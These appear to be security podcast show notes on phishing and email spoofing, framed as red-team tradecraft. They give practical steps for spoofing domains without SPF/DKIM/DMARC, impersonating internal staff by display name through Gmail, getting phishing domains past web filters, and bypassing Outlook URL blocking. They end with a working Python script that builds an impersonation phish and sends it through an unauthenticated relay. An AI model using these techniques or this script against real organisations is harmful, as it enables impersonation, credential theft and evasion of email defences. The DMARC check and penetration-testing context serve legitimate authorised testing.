This month’s podcast is hosted by Andrew, Luke, Zack, and Lane. We cover news items and then jump into our tech segment on phishing and email spoofing.
Follow us on Twitter
Hear us Talk at RVASec
Meet us at NapSec (Monthly – next is on May 17th)
Technical Segment: Email Spoofing and Phishing
Highlight: If a company uses Google Apps for Work and has not published SPF/DKIM/DMARC records, its domain can be spoofed very reliably. Follow the techniques in the Cobalt Strike blog post; the only thing that gets in your way is the target having set up the DNS TXT records for SPF/DKIM/DMARC. Note that a DMARC record with p=none only reports; a spoof is blocked only when the policy is quarantine or reject.
- Surprise surprise, people click links! Do you even need to be crafty? Probably not, but let’s discuss some ways anyhow.
- You can spoof emails. It does happen; see the great write-up from Cobalt Strike.
- If you are new to email spoofing you should really read this article.
- Telnet to the mail server and craft the message by hand. This works against the default configuration of many email servers and security appliances: if SPF/DKIM/DMARC are not set up, you can send mail as the domain without authenticating. The Cobalt Strike blog demonstrates this.
- This can also be done with Gmail. A spoof into a normal gmail.com mailbox shows up as spoofed, but what about Google Apps for Work? If the domain has no SPF/DKIM/DMARC, you can very easily spoof email from it, both to the target domain itself and externally, and it will very frequently bypass security controls. We will release code on how to do that.
- We normally target organizations that run Outlook. Outlook presents only the display-name portion of the From header to users, not the address, so you can send from a Gmail account (which bypasses controls because it is a legitimate Gmail sender) using Python or another scripting language and set the display name to an internal person’s name for a quasi-spoof.
- Submit your phishing domain to web content filters such as BlueCoat for categorization.
- Having live content on your phishing domain before the engagement also helps it get categorized in your favour.
- HTML paragraph tags can bypass URL “BLOCKED” filtering in Outlook.
- Consider the use of URL shorteners.
- Test, test, test with your target POC before deploying to the organization (if possible).
- Tools to help with Phishing: Social Engineering Toolkit (SET), SpeedPhish Framework (SPF), GoPhish, Lucy
- [Code] Example Script to send Email in Python
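As an added example for these notes (not the script mentioned in the segment, which the hosts say they will release separately), the following Python builds a display-name quasi-spoof of the kind described for Outlook, returns the raw SMTP dialogue you would otherwise type over telnet (envelope MAIL FROM separate from the From: header, dot-stuffing included), and interprets a DMARC TXT record to show when such a spoof is actually enforced against. Every address, host name and record string is a placeholder; delivery is a dry run unless you pass dry_run=False.

```python
"""Display-name "quasi-spoof" plus the raw SMTP dialogue behind it.

Constructed example for the show notes: every address, host name and
record string below is a placeholder, not a real target.
"""
import smtplib
from email.message import EmailMessage
from email.utils import parseaddr


def build_message(display_name, sender_addr, recipient, subject, body, reply_to=None):
    """Build the phish. display_name is what Outlook renders in the reading
    pane; sender_addr is the address SPF/DKIM/DMARC actually evaluate, so a
    real Gmail account here keeps the message "authenticated" while the name
    impersonates someone inside the target."""
    msg = EmailMessage()
    msg["From"] = f"{display_name} <{sender_addr}>"
    msg["To"] = recipient
    msg["Subject"] = subject
    if reply_to:
        msg["Reply-To"] = reply_to  # collect replies without touching From:
    msg.set_content(body)
    return msg


def what_outlook_shows(msg):
    """Split From: into (display name, address). Outlook shows only the first
    element, which is the whole trick."""
    return parseaddr(str(msg["From"]))


def smtp_dialogue(msg, helo_name, mail_from, rcpt_to):
    """Client side of the SMTP session, i.e. what you would type into
    `telnet mailhost 25`. The envelope MAIL FROM is independent of the From:
    header, which is why an unauthenticated relay will carry a spoofed header
    unless SPF/DMARC on the receiving side rejects it."""
    lines = [f"EHLO {helo_name}",
             f"MAIL FROM:<{mail_from}>",
             f"RCPT TO:<{rcpt_to}>",
             "DATA"]
    raw = msg.as_string(policy=msg.policy.clone(linesep="\r\n"))
    for line in raw.rstrip("\r\n").split("\r\n"):
        # RFC 5321 dot-stuffing: a data line starting with "." gets a second "."
        lines.append("." + line if line.startswith(".") else line)
    lines += [".", "QUIT"]
    return lines


def send(msg, host, port=25, dry_run=True):
    """Deliver through a relay with no authentication (the default-config
    case from the segment). dry_run returns the dialogue instead of connecting."""
    mail_from = parseaddr(str(msg["From"]))[1]
    rcpt_to = parseaddr(str(msg["To"]))[1]
    if dry_run:
        return smtp_dialogue(msg, "attacker-host.example", mail_from, rcpt_to)
    with smtplib.SMTP(host, port) as smtp:
        smtp.send_message(msg, from_addr=mail_from, to_addrs=[rcpt_to])
    return None


def dmarc_policy(txt_record):
    """Interpret the TXT record at _dmarc.<domain> as a resolver returns it.
    Returns 'none', 'quarantine' or 'reject', or None when there is no valid
    DMARC record. None or 'none' means a header spoof of that domain is not
    enforced against; only quarantine/reject actually stop it."""
    if not txt_record or not txt_record.strip().lower().startswith("v=dmarc1"):
        return None
    tags = dict(kv.strip().split("=", 1)
                for kv in txt_record.split(";") if "=" in kv)
    return tags.get("p", "").strip().lower() or None


if __name__ == "__main__":
    phish = build_message("Jane Doe", "redteam.sender@gmail.com",
                          "victim@target.example", "Updated expense policy",
                          "Please review the new policy.\n.. and reply by Friday.")
    print("Outlook shows / real sender:", what_outlook_shows(phish))
    print("\n".join(send(phish, "mail.target.example")))  # dry run
    for rec in (None, "v=DMARC1; p=none; rua=mailto:dmarc@target.example",
                "v=DMARC1; p=reject"):
        print(repr(rec), "->", dmarc_policy(rec))
```

Run it as-is to see the dialogue and the display-name/address split; point `send(..., dry_run=False)` at a relay you are authorized to test. The real check before an engagement is to resolve `_dmarc.<target>` and feed the TXT string to `dmarc_policy`: anything other than quarantine or reject means the header spoof the segment describes is still deliverable.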